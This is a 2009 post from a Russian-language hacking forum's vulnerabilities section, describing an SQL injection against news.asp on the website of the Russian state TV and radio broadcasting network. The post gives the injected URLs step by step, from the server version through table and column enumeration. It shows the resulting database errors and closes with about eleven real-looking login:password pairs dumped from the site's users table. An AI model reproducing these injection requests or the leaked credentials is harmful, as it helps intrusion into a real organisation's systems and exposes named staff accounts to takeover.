ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 19.04.2009, 23:17
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Федеральное Государственное Унитарное Предприятие "Российская Телевизионная и Радиовещательная Сеть"
Цитата:
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+@@version)
Код:
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6001: Service Pack 1)
Цитата:
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+system_user )
Код:
Conversion failed when converting the nvarchar value 'frontcontent' to data type int.
Проверил все таблы
Цитата:
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+table_name+ from+information_schema.tables+where+table_name
+not+in+('GROUP_MEMBERSHIP','GROUP_RIGHTS','CONTEN T_37','SITE','SYSTEM_VARS','USER_RIGHTS','CONTENT_ TYPE','CON
TENT_TYPE','CONTENT_10','test1','PAGE','SITE_LANG' ,'TEMPLATE','CONTENT_68','ATTRIBUTE_GROUP','CONTEN T','CONTEN
T_49','CONTENT_TYPE_LINK','CONTENT_ATTRIBUTE','CON TENT_LINK','CONTENT_DATA','CONTENT_11','CONTAINER' ,'FORMAT',
'CONTENT_4','CONTENT_TYPE_GROUP','CONTENT_47','CON TENT_12','CONTENT_57','ROLE','USER_ROLE','CONTENT_ 42','CONTE
NT_71','GROUP_ROLE','ROLE_RIGHTS','SITE_SECTIONS', 'VIEWS','CONTENT_54','VIEW_CONTENT_TYPE','CONTENT_ 56','CONTE
NT_59','CONTENT_48','dtproperties','UNIT','CONTENT _13','CONTENT_44','CONTENT_73','CONTENT_65','CONTE NT_16','CO
NTENT_38','UNIT_SETTING','CONTENT_51','CONTENT_43' ,'CONTENT_52','CONTENT_2','CONTENT_55','CONTENT_46 ','CONTENT
_3','CONTENT_67','CONTENT_19','CONTENT_39','CONTEN T_24','CONTENT_60','CONTENT_14','CONTENT_41','CONT ENT_20','C
ONTENT_45','CONTENT_15','CONTENT_63','CONTENT_5',' CONTENT_23','CONTENT_69','CONTENT_50','CONTENT_58' ,'CONTENT_
6','CONTENT_70','CONTENT_61','CONTENT_40','CONTENT _7','CONTENT_25','CONTENT_53','CONTENT_62','CONTEN T_66','CON
TENT_8','CONTENT_36','ATTRIBUTE_TYPE','CONTENT_72' ,'CONTAINER_TYPE','CONTENT_17','CONTENT_STATUS','D B_VERSION'
,'LANGUAGE','OBJECT','SYSTEM_VARS_GROUP','CONTENT_ 9','USERS','USER_GROUP','BACKEND_SECTION','CONTENT _64'))
Понравилась только users

Цитата:
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+column_name +from+information_schema.columns+where+table_name= 'users'+and+column_name+like+'%login%')
Код:
Conversion failed when converting the nvarchar value 'login' to data type int.
Цитата:
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+column_name +from+information_schema.columns+where+table_name= 'users'+and+column_name+like+'%pass%')
Код:
Conversion failed when converting the nvarchar value 'password' to data type int.
Цитата:
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+login+from+ users)
Код:
fc_admin
Цитата:
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+password+fr om+users+where+login='fc_admin')
frontier

В итоге вот все юзеры:
Код:
fc_admin:frontier
rtrs-editor:VMc2r7k
dmitry:karakyli
ivelum_KVP:D7KAK8I
ivelum_LPP:0XEzzv
BolotovaE:HarryPotter
ivelum_YME:moscow5
ivelum_mcsim:M2CRqk3X
rtrs-Olga:HttfR76m0b
Val:
Sob:qwertyui
От чего юзеры незнаю,т.к. нашел только форум и webmail на сайте.

Последний раз редактировалось ILYAtirtir; 19.04.2009 в 23:22..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ